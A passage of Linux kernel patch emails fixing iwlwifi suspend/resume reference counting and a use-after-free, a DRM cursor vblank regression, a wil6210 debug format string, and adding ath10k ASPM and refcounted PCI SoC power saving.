iwl_mvm_unref+0xc9/0xd0 [iwlmvm] [40026.149030] [] iwl_mvm_mac_reconfig_complete+0x7d/0x210 [iwlmvm] [40026.151645] [] ? ftrace_raw_event_drv_reconfig_complete+0xc0/0xe0 [mac80211] [40026.154291] [] ieee80211_reconfig+0x28e/0x2620 [mac80211] [40026.156920] [] ? ring_buffer_unlock_commit+0xba/0x100 [40026.159585] [] ieee80211_resume+0x6d/0x80 [mac80211] [40026.162206] [] wiphy_resume+0x72/0x260 [cfg80211] [40026.164799] [] ? device_resume+0x57/0x150 [40026.167425] [] ? wiphy_suspend+0x710/0x710 [cfg80211] [40026.170075] [] dpm_run_callback+0x2e/0x50 [40026.172695] [] device_resume+0x91/0x150 [40026.175334] [] dpm_resume+0xf6/0x200 [40026.177922] [] dpm_resume_end+0x10/0x20 [40026.180489] [] suspend_devices_and_enter+0x177/0x480 [40026.183037] [] ? printk+0x4d/0x4f [40026.185559] [] pm_suspend+0x176/0x210 [40026.188065] [] state_store+0x5d/0xb0 [40026.190581] [] ? wakeup_count_show+0x50/0x50 [40026.193052] [] kobj_attr_store+0x1b/0x30 [40026.195608] [] sysfs_write_file+0xab/0x100 [40026.198055] [] ? sysfs_poll+0xa0/0xa0 [40026.200469] [] vfs_write+0xa5/0x1c0 [40026.202893] [] SyS_write+0x57/0xa0 [40026.205245] [] sysenter_do_call+0x12/0x32 [40026.207619] ---[ end trace db1d5a72a0381b0a ]--- Signed-off-by: Luciano Coelho Reviewed-by: EliadX Peller Reviewed-by: Johannes Berg Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/d3.c | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/d3.c b/drivers/net/wireless/iwlwifi/mvm/d3.c index 42dadaf5e24d..91ca8df007f7 100644 --- a/drivers/net/wireless/iwlwifi/mvm/d3.c +++ b/drivers/net/wireless/iwlwifi/mvm/d3.c @@ -1917,6 +1917,14 @@ static int __iwl_mvm_resume(struct iwl_mvm *mvm, bool test) /* return 1 to reconfigure the device */ set_bit(IWL_MVM_STATUS_IN_HW_RESTART, &mvm->status); set_bit(IWL_MVM_STATUS_D3_RECONFIG, &mvm->status); + + /* We always return 1, which causes mac80211 to do a reconfig + * with IEEE80211_RECONFIG_TYPE_RESTART. This type of + * reconfig calls iwl_mvm_restart_complete(), where we unref + * the IWL_MVM_REF_UCODE_DOWN, so we need to take the + * reference here. + */ + iwl_mvm_ref(mvm, IWL_MVM_REF_UCODE_DOWN); return 1; } @@ -2023,7 +2031,6 @@ static int iwl_mvm_d3_test_release(struct inode *inode, struct file *file) __iwl_mvm_resume(mvm, true); rtnl_unlock(); iwl_abort_notification_waits(&mvm->notif_wait); - iwl_mvm_ref(mvm, IWL_MVM_REF_UCODE_DOWN); ieee80211_restart_hw(mvm->hw); /* wait for restart and disconnect all interfaces */ From a500e469ead055f35c7b2d0a1104e1bd58e34e70 Mon Sep 17 00:00:00 2001 From: Luciano Coelho Date: Mon, 4 May 2015 17:03:17 +0300 Subject: [PATCH 154/872] iwlwifi: mvm: clean net-detect info if device was reset during suspend If the device is reset during suspend with net-detect enabled, we leave the net-detect information dangling and this causes the next suspend to fail with a warning: [21795.351010] WARNING: at /root/iwlwifi/iwlwifi-stack-dev/drivers/net/wireless/iwlwifi/mvm/d3.c:989 __iwl_mvm_suspend.isra.6+0x2be/0x460 [iwlmvm]() [21795.353253] Modules linked in: iwlmvm(O) iwlwifi(O) mac80211(O) cfg80211(O) compat(O) [...] [21795.366168] CPU: 1 PID: 3645 Comm: bash Tainted: G O 3.10.29-dev #1 [21795.368785] Hardware name: Dell Inc. Latitude E6430/0CPWYR, BIOS A09 12/13/2012 [21795.371441] f8ec6748 f8ec6748 e51f3ce8 c168aa62 e51f3d10 c103a824 c1871238 f8ec6748 [21795.374228] 000003dd f8eb982e f8eb982e 00000000 c3408ed4 c41edbbc e51f3d20 c103a862 [21795.377006] 00000009 00000000 e51f3da8 f8eb982e c41ee3dc 00000004 e7970000 e51f3d74 [21795.379792] Call Trace: [21795.382461] [] dump_stack+0x16/0x18 [21795.385133] [] warn_slowpath_common+0x64/0x80 [21795.387803] [] ? __iwl_mvm_suspend.isra.6+0x2be/0x460 [iwlmvm] [21795.390485] [] ? __iwl_mvm_suspend.isra.6+0x2be/0x460 [iwlmvm] [21795.393124] [] warn_slowpath_null+0x22/0x30 [21795.395787] [] __iwl_mvm_suspend.isra.6+0x2be/0x460 [iwlmvm] [21795.398464] [] iwl_mvm_suspend+0xec/0x140 [iwlmvm] [21795.401127] [] ? del_timer_sync+0xa1/0xc0 [21795.403800] [] __ieee80211_suspend+0x1de/0xff0 [mac80211] [21795.406459] [] ? mutex_lock_nested+0x25d/0x350 [21795.409084] [] ? rtnl_lock+0x14/0x20 [21795.411685] [] ieee80211_suspend+0x16/0x20 [mac80211] [21795.414318] [] wiphy_suspend+0x74/0x710 [cfg80211] [21795.416916] [] __device_suspend+0x1e2/0x220 [21795.419521] [] ? addresses_show+0xa0/0xa0 [cfg80211] [21795.422097] [] dpm_suspend+0x67/0x210 [21795.424661] [] dpm_suspend_start+0x4f/0x60 [21795.427219] [] suspend_devices_and_enter+0x60/0x480 [21795.429768] [] ? printk+0x4d/0x4f [21795.432295] [] pm_suspend+0x176/0x210 [21795.434830] [] state_store+0x5d/0xb0 [21795.437410] [] ? wakeup_count_show+0x50/0x50 [21795.439961] [] kobj_attr_store+0x1b/0x30 [21795.442514] [] sysfs_write_file+0xab/0x100 [21795.445088] [] ? sysfs_poll+0xa0/0xa0 [21795.447659] [] vfs_write+0xa5/0x1c0 [21795.450212] [] SyS_write+0x57/0xa0 [21795.452699] [] sysenter_do_call+0x12/0x32 [21795.455146] ---[ end trace faf5321baba2bfdb ]--- To fix this, call the iwl_mvm_free_nd() function in case of any error during resume. Additionally, rename the "out_unlock" label to err to make it clearer that it's only called in error conditions. Cc: stable@vger.kernel.org [3.19+] Signed-off-by: Luciano Coelho Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/d3.c | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/d3.c b/drivers/net/wireless/iwlwifi/mvm/d3.c index 91ca8df007f7..4310cf102d78 100644 --- a/drivers/net/wireless/iwlwifi/mvm/d3.c +++ b/drivers/net/wireless/iwlwifi/mvm/d3.c @@ -1870,15 +1870,15 @@ static int __iwl_mvm_resume(struct iwl_mvm *mvm, bool test) /* get the BSS vif pointer again */ vif = iwl_mvm_get_bss_vif(mvm); if (IS_ERR_OR_NULL(vif)) - goto out_unlock; + goto err; ret = iwl_trans_d3_resume(mvm->trans, &d3_status, test); if (ret) - goto out_unlock; + goto err; if (d3_status != IWL_D3_STATUS_ALIVE) { IWL_INFO(mvm, "Device was reset during suspend\n"); - goto out_unlock; + goto err; } /* query SRAM first in case we want event logging */ @@ -1904,7 +1904,8 @@ static int __iwl_mvm_resume(struct iwl_mvm *mvm, bool test) goto out_iterate; } - out_unlock: +err: + iwl_mvm_free_nd(mvm); mutex_unlock(&mvm->mutex); out_iterate: From 292208914d8ca5a41cf68c2f1d2810a2ea2044e9 Mon Sep 17 00:00:00 2001 From: Eliad Peller Date: Tue, 14 Apr 2015 11:36:23 +0300 Subject: [PATCH 155/872] iwlwifi: mvm: avoid use-after-free on iwl_mvm_d0i3_enable_tx() qos_seq points (to a struct) inside the command response data. Make sure to free the response only after qos_seq is not needed anymore. Reported-by: Heng Luo Signed-off-by: Eliad Peller Signed-off-by: Emmanuel Grumbach --- drivers/net/wireless/iwlwifi/mvm/ops.c | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/iwlwifi/mvm/ops.c b/drivers/net/wireless/iwlwifi/mvm/ops.c index 1c66297d82c0..2ea01238754e 100644 --- a/drivers/net/wireless/iwlwifi/mvm/ops.c +++ b/drivers/net/wireless/iwlwifi/mvm/ops.c @@ -1263,11 +1263,13 @@ static void iwl_mvm_d0i3_exit_work(struct work_struct *wk) ieee80211_iterate_active_interfaces( mvm->hw, IEEE80211_IFACE_ITER_NORMAL, iwl_mvm_d0i3_disconnect_iter, mvm); - - iwl_free_resp(&get_status_cmd); out: iwl_mvm_d0i3_enable_tx(mvm, qos_seq); + /* qos_seq might point inside resp_pkt, so free it only now */ + if (get_status_cmd.resp_pkt) + iwl_free_resp(&get_status_cmd); + /* the FW might have updated the regdomain */ iwl_mvm_update_changed_regdom(mvm); From 2e7f43c41c042d6fed4d67aceeaae32d8f102e98 Mon Sep 17 00:00:00 2001 From: Daniel Vetter Date: Wed, 20 May 2015 10:36:32 +0200 Subject: [PATCH 156/872] drm/plane-helper: Adapt cursor hack to transitional helpers In commit f02ad907cd9e7fe3a6405d2d005840912f1ed258 Author: Daniel Vetter Date: Thu Jan 22 16:36:23 2015 +0100 drm/atomic-helpers: Recover full cursor plane behaviour we've added a hack to atomic helpers to never to vblank waits for cursor updates through the legacy apis since that's what X expects. Unfortunately we've (again) forgotten to adjust the transitional helpers. Do this now. This fixes regressions for drivers only partially converted over to atomic (like i915). Reported-by: Pekka Paalanen Cc: Pekka Paalanen Cc: stable@vger.kernel.org Signed-off-by: Daniel Vetter Reviewed-and-tested-by: Mario Kleiner Signed-off-by: Jani Nikula --- drivers/gpu/drm/drm_plane_helper.c | 3 +++ 1 file changed, 3 insertions(+) diff --git a/drivers/gpu/drm/drm_plane_helper.c b/drivers/gpu/drm/drm_plane_helper.c index 40c1db9ad7c3..2f0ed11024eb 100644 --- a/drivers/gpu/drm/drm_plane_helper.c +++ b/drivers/gpu/drm/drm_plane_helper.c @@ -465,6 +465,9 @@ int drm_plane_helper_commit(struct drm_plane *plane, if (!crtc[i]) continue; + if (crtc[i]->cursor == plane) + continue; + /* There's no other way to figure out whether the crtc is running. */ ret = drm_crtc_vblank_get(crtc[i]); if (ret == 0) { From 80714b09bc574c5b23e50264e76e6e0f78d23549 Mon Sep 17 00:00:00 2001 From: Vladimir Kondratiev Date: Mon, 11 May 2015 19:10:48 +0300 Subject: [PATCH 157/872] wil6210: fix format specifier for dma_addr_t Fix format specifier used for dma_addr_t, namely use %pad Debug print virtual address for the same buffer as well. Fixes: dc16427bbe65 ("wil6210: Add pmc debug mechanism memory management") Signed-off-by: Vladimir Kondratiev Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/wil6210/pmc.c | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/drivers/net/wireless/ath/wil6210/pmc.c b/drivers/net/wireless/ath/wil6210/pmc.c index 3cb4f35ebd05..8a8cdc61b25b 100644 --- a/drivers/net/wireless/ath/wil6210/pmc.c +++ b/drivers/net/wireless/ath/wil6210/pmc.c @@ -92,9 +92,9 @@ void wil_pmc_alloc(struct wil6210_priv *wil, GFP_KERNEL); wil_dbg_misc(wil, - "%s: allocated pring %p. %zd x %d = total %zd bytes\n", + "%s: allocated pring %p => %pad. %zd x %d = total %zd bytes\n", __func__, - (void *)pmc->pring_pa, + pmc->pring_va, &pmc->pring_pa, sizeof(struct vring_tx_desc), num_descriptors, sizeof(struct vring_tx_desc) * num_descriptors); From 76d870ed09ab34154454b1adb823ae75f173c2d2 Mon Sep 17 00:00:00 2001 From: Janusz Dziedzic Date: Mon, 18 May 2015 09:38:16 +0000 Subject: [PATCH 158/872] ath10k: enable ASPM It is actually safe to enable ASPM after the device is booted up. This reduces power drain of QCA61X4 when driver is simply loaded (no interface is up) from 31mA to 14mA. QCA988X wasn't measured but doesn't seem to regress in any other way. Signed-off-by: Janusz Dziedzic Signed-off-by: Michal Kazior Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath10k/pci.c | 15 ++++++++++----- drivers/net/wireless/ath/ath10k/pci.h | 6 ++++++ 2 files changed, 16 insertions(+), 5 deletions(-) diff --git a/drivers/net/wireless/ath/ath10k/pci.c b/drivers/net/wireless/ath/ath10k/pci.c index 969a1231800e..8be07c653b2d 100644 --- a/drivers/net/wireless/ath/ath10k/pci.c +++ b/drivers/net/wireless/ath/ath10k/pci.c @@ -1227,11 +1227,15 @@ static void ath10k_pci_irq_enable(struct ath10k *ar) static int ath10k_pci_hif_start(struct ath10k *ar) { + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot hif start\n"); ath10k_pci_irq_enable(ar); ath10k_pci_rx_post(ar); + pcie_capability_write_word(ar_pci->pdev, PCI_EXP_LNKCTL, + ar_pci->link_ctl); + return 0; } @@ -1981,6 +1985,7 @@ static int ath10k_pci_chip_reset(struct ath10k *ar) static int ath10k_pci_hif_power_up(struct ath10k *ar) { + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); int ret; ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot hif power up\n"); @@ -1991,6 +1996,11 @@ static int ath10k_pci_hif_power_up(struct ath10k *ar) return ret; } + pcie_capability_read_word(ar_pci->pdev, PCI_EXP_LNKCTL, + &ar_pci->link_ctl); + pcie_capability_write_word(ar_pci->pdev, PCI_EXP_LNKCTL, + ar_pci->link_ctl & ~PCI_EXP_LNKCTL_ASPMC); + /* * Bring the target up cleanly. * @@ -2502,7 +2512,6 @@ static int ath10k_pci_claim(struct ath10k *ar) { struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct pci_dev *pdev = ar_pci->pdev; - u32 lcr_val; int ret; pci_set_drvdata(pdev, ar); @@ -2536,10 +2545,6 @@ static int ath10k_pci_claim(struct ath10k *ar) pci_set_master(pdev); - /* Workaround: Disable ASPM */ - pci_read_config_dword(pdev, 0x80, &lcr_val); - pci_write_config_dword(pdev, 0x80, (lcr_val & 0xffffff00)); - /* Arrange for access to Target SoC registers. */ ar_pci->mem = pci_iomap(pdev, BAR_NUM, 0); if (!ar_pci->mem) { diff --git a/drivers/net/wireless/ath/ath10k/pci.h b/drivers/net/wireless/ath/ath10k/pci.h index bddf54320160..ee2173d61257 100644 --- a/drivers/net/wireless/ath/ath10k/pci.h +++ b/drivers/net/wireless/ath/ath10k/pci.h @@ -185,6 +185,12 @@ struct ath10k_pci { /* Map CE id to ce_state */ struct ath10k_ce_pipe ce_states[CE_COUNT_MAX]; struct timer_list rx_post_retry; + + /* Due to HW quirks it is recommended to disable ASPM during device + * bootup. To do that the original PCI-E Link Control is stored before + * device bootup is executed and re-programmed later. + */ + u16 link_ctl; }; static inline struct ath10k_pci *ath10k_pci_priv(struct ath10k *ar) From 917826be9f46b13604fdfc9954dd9ce69dea93f3 Mon Sep 17 00:00:00 2001 From: Janusz Dziedzic Date: Mon, 18 May 2015 09:38:17 +0000 Subject: [PATCH 159/872] ath10k: fix idle power consumption mac80211 can update vif powersave state while disconnected. Firmware doesn't behave nicely and consumes more power than necessary if PS is disabled on a non-started vdev. Hence force-enable PS for non-running vdevs. This reduces power drain on QCA61X4 from 88mA to 36mA when interface is up and not associated. QCA988X wasn't measured. Signed-off-by: Janusz Dziedzic Signed-off-by: Michal Kazior Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath10k/mac.c | 9 ++++++++- 1 file changed, 8 insertions(+), 1 deletion(-) diff --git a/drivers/net/wireless/ath/ath10k/mac.c b/drivers/net/wireless/ath/ath10k/mac.c index eaa0182e001d..2cc0cbadd379 100644 --- a/drivers/net/wireless/ath/ath10k/mac.c +++ b/drivers/net/wireless/ath/ath10k/mac.c @@ -1738,7 +1738,14 @@ static int ath10k_mac_vif_setup_ps(struct ath10k_vif *arvif) enable_ps = false; } - if (enable_ps) { + if (!arvif->is_started) { + /* mac80211 can update vif powersave state while disconnected. + * Firmware doesn't behave nicely and consumes more power than + * necessary if PS is disabled on a non-started vdev. Hence + * force-enable PS for non-running vdevs. + */ + psmode = WMI_STA_PS_MODE_ENABLED; + } else if (enable_ps) { psmode = WMI_STA_PS_MODE_ENABLED; param = WMI_STA_PS_PARAM_INACTIVITY_TIME; From 77258d409ce45890104e3da11d0261402c49aee1 Mon Sep 17 00:00:00 2001 From: Michal Kazior Date: Mon, 18 May 2015 09:38:18 +0000 Subject: [PATCH 160/872] ath10k: enable pci soc powersaving By using SOC_WAKE register it is possible to bring down power consumption of QCA61X4 from 36mA to 16mA when associated and idle. Currently the sleep threshold/grace period is at a very conservative value of 60ms. Contrary to QCA61X4 the QCA988X firmware doesn't have Rx/beacon filtering available for client mode and SWBA events are used for beaconing in AP/IBSS so the SoC needs to be woken up at least every ~100ms in most cases. This means that QCA988X is at a disadvantage and the power consumption won't drop as much as for QCA61X4. Due to putting irq-safe spinlocks on every MMIO read/write it is expected this can cause a little performance regression on some systems. I haven't done any thorough measurements but some of my tests don't show any extreme degradation. The patch removes some explicit pci_wake calls that were added in 320e14b8db51aa ("ath10k: fix some pci wake/sleep issues"). This is safe because all MMIO accesses are now wrapped and the device is woken up automatically if necessary. Signed-off-by: Michal Kazior Signed-off-by: Kalle Valo --- drivers/net/wireless/ath/ath10k/debug.h | 1 + drivers/net/wireless/ath/ath10k/pci.c | 304 +++++++++++++++++------- drivers/net/wireless/ath/ath10k/pci.h | 89 ++++--- 3 files changed, 260 insertions(+), 134 deletions(-) diff --git a/drivers/net/wireless/ath/ath10k/debug.h b/drivers/net/wireless/ath/ath10k/debug.h index a12b8323f9f1..53bd6a19eab6 100644 --- a/drivers/net/wireless/ath/ath10k/debug.h +++ b/drivers/net/wireless/ath/ath10k/debug.h @@ -36,6 +36,7 @@ enum ath10k_debug_mask { ATH10K_DBG_REGULATORY = 0x00000800, ATH10K_DBG_TESTMODE = 0x00001000, ATH10K_DBG_WMI_PRINT = 0x00002000, + ATH10K_DBG_PCI_PS = 0x00004000, ATH10K_DBG_ANY = 0xffffffff, }; diff --git a/drivers/net/wireless/ath/ath10k/pci.c b/drivers/net/wireless/ath/ath10k/pci.c index 8be07c653b2d..17a060e8efa2 100644 --- a/drivers/net/wireless/ath/ath10k/pci.c +++ b/drivers/net/wireless/ath/ath10k/pci.c @@ -330,6 +330,205 @@ static const struct service_to_pipe target_service_to_ce_map_wlan[] = { }, }; +static bool ath10k_pci_is_awake(struct ath10k *ar) +{ + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + u32 val = ioread32(ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + + RTC_STATE_ADDRESS); + + return RTC_STATE_V_GET(val) == RTC_STATE_V_ON; +} + +static void __ath10k_pci_wake(struct ath10k *ar) +{ + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + + lockdep_assert_held(&ar_pci->ps_lock); + + ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps wake reg refcount %lu awake %d\n", + ar_pci->ps_wake_refcount, ar_pci->ps_awake); + + iowrite32(PCIE_SOC_WAKE_V_MASK, + ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + + PCIE_SOC_WAKE_ADDRESS); +} + +static void __ath10k_pci_sleep(struct ath10k *ar) +{ + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + + lockdep_assert_held(&ar_pci->ps_lock); + + ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps sleep reg refcount %lu awake %d\n", + ar_pci->ps_wake_refcount, ar_pci->ps_awake); + + iowrite32(PCIE_SOC_WAKE_RESET, + ar_pci->mem + PCIE_LOCAL_BASE_ADDRESS + + PCIE_SOC_WAKE_ADDRESS); + ar_pci->ps_awake = false; +} + +static int ath10k_pci_wake_wait(struct ath10k *ar) +{ + int tot_delay = 0; + int curr_delay = 5; + + while (tot_delay < PCIE_WAKE_TIMEOUT) { + if (ath10k_pci_is_awake(ar)) + return 0; + + udelay(curr_delay); + tot_delay += curr_delay; + + if (curr_delay < 50) + curr_delay += 5; + } + + return -ETIMEDOUT; +} + +static int ath10k_pci_wake(struct ath10k *ar) +{ + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + unsigned long flags; + int ret = 0; + + spin_lock_irqsave(&ar_pci->ps_lock, flags); + + ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps wake refcount %lu awake %d\n", + ar_pci->ps_wake_refcount, ar_pci->ps_awake); + + /* This function can be called very frequently. To avoid excessive + * CPU stalls for MMIO reads use a cache var to hold the device state. + */ + if (!ar_pci->ps_awake) { + __ath10k_pci_wake(ar); + + ret = ath10k_pci_wake_wait(ar); + if (ret == 0) + ar_pci->ps_awake = true; + } + + if (ret == 0) { + ar_pci->ps_wake_refcount++; + WARN_ON(ar_pci->ps_wake_refcount == 0); + } + + spin_unlock_irqrestore(&ar_pci->ps_lock, flags); + + return ret; +} + +static void ath10k_pci_sleep(struct ath10k *ar) +{ + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + unsigned long flags; + + spin_lock_irqsave(&ar_pci->ps_lock, flags); + + ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps sleep refcount %lu awake %d\n", + ar_pci->ps_wake_refcount, ar_pci->ps_awake); + + if (WARN_ON(ar_pci->ps_wake_refcount == 0)) + goto skip; + + ar_pci->ps_wake_refcount--; + + mod_timer(&ar_pci->ps_timer, jiffies + + msecs_to_jiffies(ATH10K_PCI_SLEEP_GRACE_PERIOD_MSEC)); + +skip: + spin_unlock_irqrestore(&ar_pci->ps_lock, flags); +} + +static void ath10k_pci_ps_timer(unsigned long ptr) +{ + struct ath10k *ar = (void *)ptr; + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + unsigned long flags; + + spin_lock_irqsave(&ar_pci->ps_lock, flags); + + ath10k_dbg(ar, ATH10K_DBG_PCI_PS, "pci ps timer refcount %lu awake %d\n", + ar_pci->ps_wake_refcount, ar_pci->ps_awake); + + if (ar_pci->ps_wake_refcount > 0) + goto skip; + + __ath10k_pci_sleep(ar); + +skip: + spin_unlock_irqrestore(&ar_pci->ps_lock, flags); +} + +static void ath10k_pci_sleep_sync(struct ath10k *ar) +{ + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + unsigned long flags; + + del_timer_sync(&ar_pci->ps_timer); + + spin_lock_irqsave(&ar_pci->ps_lock, flags); + WARN_ON(ar_pci->ps_wake_refcount > 0); + __ath10k_pci_sleep(ar); + spin_unlock_irqrestore(&ar_pci->ps_lock, flags); +} + +void ath10k_pci_write32(struct ath10k *ar, u32 offset, u32 value) +{ + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + int ret; + + ret = ath10k_pci_wake(ar); + if (ret) { + ath10k_warn(ar, "failed to wake target for write32 of 0x%08x at 0x%08x: %d\n", + value, offset, ret); + return; + } + + iowrite32(value, ar_pci->mem + offset); + ath10k_pci_sleep(ar); +} + +u32 ath10k_pci_read32(struct ath10k *ar, u32 offset) +{ + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + u32 val; + int ret; + + ret = ath10k_pci_wake(ar); + if (ret) { + ath10k_warn(ar, "failed to wake target for read32 at 0x%08x: %d\n", + offset, ret); + return 0xffffffff; + } + + val = ioread32(ar_pci->mem + offset); + ath10k_pci_sleep(ar); + + return val; +} + +u32 ath10k_pci_soc_read32(struct ath10k *ar, u32 addr) +{ + return ath10k_pci_read32(ar, RTC_SOC_BASE_ADDRESS + addr); +} + +void ath10k_pci_soc_write32(struct ath10k *ar, u32 addr, u32 val) +{ + ath10k_pci_write32(ar, RTC_SOC_BASE_ADDRESS + addr, val); +} + +u32 ath10k_pci_reg_read32(struct ath10k *ar, u32 addr) +{ + return ath10k_pci_read32(ar, PCIE_LOCAL_BASE_ADDRESS + addr); +} + +void ath10k_pci_reg_write32(struct ath10k *ar, u32 addr, u32 val) +{ + ath10k_pci_write32(ar, PCIE_LOCAL_BASE_ADDRESS + addr, val); +} + static bool ath10k_pci_irq_pending(struct ath10k *ar) { u32 cause; @@ -793,60 +992,6 @@ static int ath10k_pci_diag_write32(struct ath10k *ar, u32 address, u32 value) return ath10k_pci_diag_write_mem(ar, address, &val, sizeof(val)); } -static bool ath10k_pci_is_awake(struct ath10k *ar) -{ - u32 val = ath10k_pci_reg_read32(ar, RTC_STATE_ADDRESS); - - return RTC_STATE_V_GET(val) == RTC_STATE_V_ON; -} - -static int ath10k_pci_wake_wait(struct ath10k *ar) -{ - int tot_delay = 0; - int curr_delay = 5; - - while (tot_delay < PCIE_WAKE_TIMEOUT) { - if (ath10k_pci_is_awake(ar)) - return 0; - - udelay(curr_delay); - tot_delay += curr_delay; - - if (curr_delay < 50) - curr_delay += 5; - } - - return -ETIMEDOUT; -} - -/* The rule is host is forbidden from accessing device registers while it's - * asleep. Currently ath10k_pci_wake() and ath10k_pci_sleep() calls aren't - * balanced and the device is kept awake all the time. This is intended for a - * simpler solution for the following problems: - * - * * device can enter sleep during s2ram without the host knowing, - * - * * irq handlers access registers which is a problem if other device asserts - * a shared irq line when ath10k is between hif_power_down() and - * hif_power_up(). - * - * FIXME: If power consumption is a concern (and there are *real* gains) then a - * refcounted wake/sleep needs to be implemented. - */ - -static int ath10k_pci_wake(struct ath10k *ar) -{ - ath10k_pci_reg_write32(ar, PCIE_SOC_WAKE_ADDRESS, - PCIE_SOC_WAKE_V_MASK); - return ath10k_pci_wake_wait(ar); -} - -static void ath10k_pci_sleep(struct ath10k *ar) -{ - ath10k_pci_reg_write32(ar, PCIE_SOC_WAKE_ADDRESS, - PCIE_SOC_WAKE_RESET); -} - /* Called by lower (CE) layer when a send to Target completes. */ static void ath10k_pci_ce_send_done(struct ath10k_ce_pipe *ce_state) { @@ -1348,6 +1493,9 @@ static void ath10k_pci_flush(struct ath10k *ar) static void ath10k_pci_hif_stop(struct ath10k *ar) { + struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); + unsigned long flags; + ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot hif stop\n"); /* Most likely the device has HTT Rx ring configured. The only way to @@ -1366,6 +1514,10 @@ static void ath10k_pci_hif_stop(struct ath10k *ar) ath10k_pci_irq_disable(ar); ath10k_pci_irq_sync(ar); ath10k_pci_flush(ar); + + spin_lock_irqsave(&ar_pci->ps_lock, flags); + WARN_ON(ar_pci->ps_wake_refcount > 0); + spin_unlock_irqrestore(&ar_pci->ps_lock, flags); } static int ath10k_pci_hif_exchange_bmi_msg(struct ath10k *ar, @@ -1990,12 +2142,6 @@ static int ath10k_pci_hif_power_up(struct ath10k *ar) ath10k_dbg(ar, ATH10K_DBG_BOOT, "boot hif power up\n"); - ret = ath10k_pci_wake(ar); - if (ret) { - ath10k_err(ar, "failed to wake up target: %d\n", ret); - return ret; - } - pcie_capability_read_word(ar_pci->pdev, PCI_EXP_LNKCTL, &ar_pci->link_ctl); pcie_capability_write_word(ar_pci->pdev, PCI_EXP_LNKCTL, @@ -2047,7 +2193,6 @@ static int ath10k_pci_hif_power_up(struct ath10k *ar) ath10k_pci_ce_deinit(ar); err_sleep: - ath10k_pci_sleep(ar); return ret; } @@ -2064,7 +2209,12 @@ static void ath10k_pci_hif_power_down(struct ath10k *ar) static int ath10k_pci_hif_suspend(struct ath10k *ar) { - ath10k_pci_sleep(ar); + /* The grace timer can still be counting down and ar->ps_awake be true. + * It is known that the device may be asleep after resuming regardless + * of the SoC powersave state before suspending. Hence make sure the + * device is asleep before proceeding. + */ + ath10k_pci_sleep_sync(ar); return 0; } @@ -2074,13 +2224,6 @@ static int ath10k_pci_hif_resume(struct ath10k *ar) struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); struct pci_dev *pdev = ar_pci->pdev; u32 val; - int ret; - - ret = ath10k_pci_wake(ar); - if (ret) { - ath10k_err(ar, "failed to wake device up on resume: %d\n", ret); - return ret; - } /* Suspend/Resume resets the PCI configuration space, so we have to * re-disable the RETRY_TIMEOUT register (0x41) to keep PCI Tx retries @@ -2091,7 +2234,7 @@ static int ath10k_pci_hif_resume(struct ath10k *ar) if ((val & 0x0000ff00) != 0) pci_write_config_dword(pdev, 0x40, val & 0xffff00ff); - return ret; + return 0; } #endif @@ -2185,13 +2328,6 @@ static irqreturn_t ath10k_pci_interrupt_handler(int irq, void *arg) { struct ath10k *ar = arg; struct ath10k_pci *ar_pci = ath10k_pci_priv(ar); - int ret; - - ret = ath10k_pci_wake(ar); - if (ret) { - ath10k_warn(ar, "failed to wake device up on irq: %d\n", ret); - return IRQ_NONE; - } if (ar_pci->num_msi_intrs == 0) { if (!ath10k_pci_irq_pending(ar)) @@ -2638,8 +2774,12 @@ static int ath10k_pci_probe(struct pci_dev *pdev, pdev->subsystem_vendor, pdev->subsystem_device); spin_lock_init(&ar_pci->ce_lock); + spin_lock_init(&ar_pci->ps_lock); + setup_timer(&ar_pci->rx_post_retry, ath10k_pci_rx_replenish_retry, (unsigned long)ar); + setup_timer(&ar_pci->ps_timer, ath10k_pci_ps_timer, + (unsigned long)ar); ret = ath10k_pci_claim(ar); if (ret) { @@ -2647,12 +2787,6 @@ static int ath10k_pci_probe(struct pci_dev *pdev, goto err_core_destroy; } - ret = ath10k_pci_wake(ar); - if (ret) { - ath10k_err(ar, "failed to wake up: %d\n", ret); - goto err_release; - } - ret = ath10k_pci_alloc_pipes(ar); if (ret) { ath10k_err(ar, "failed to allocate copy engine pipes: %d\n", @@ -2716,9 +2850,6 @@ static int ath10k_pci_probe(struct pci_dev *pdev, ath10k_pci_free_pipes(ar); err_sleep: - ath10k_pci_sleep(ar); - -err_release: ath10k_pci_release(ar); err_core_destroy: @@ -2748,6 +2879,7 @@ static void ath10k_pci_remove(struct pci_dev *pdev) ath10k_pci_deinit_irq(ar); ath10k_pci_ce_deinit(ar); ath10k_pci_free_pipes(ar); + ath10k_pci_sleep_sync(ar); ath10k_pci_release(ar); ath10k_core_destroy(ar); } diff --git a/drivers/net/wireless/ath/ath10k/pci.h b/drivers/net/wireless/ath/ath10k/pci.h index 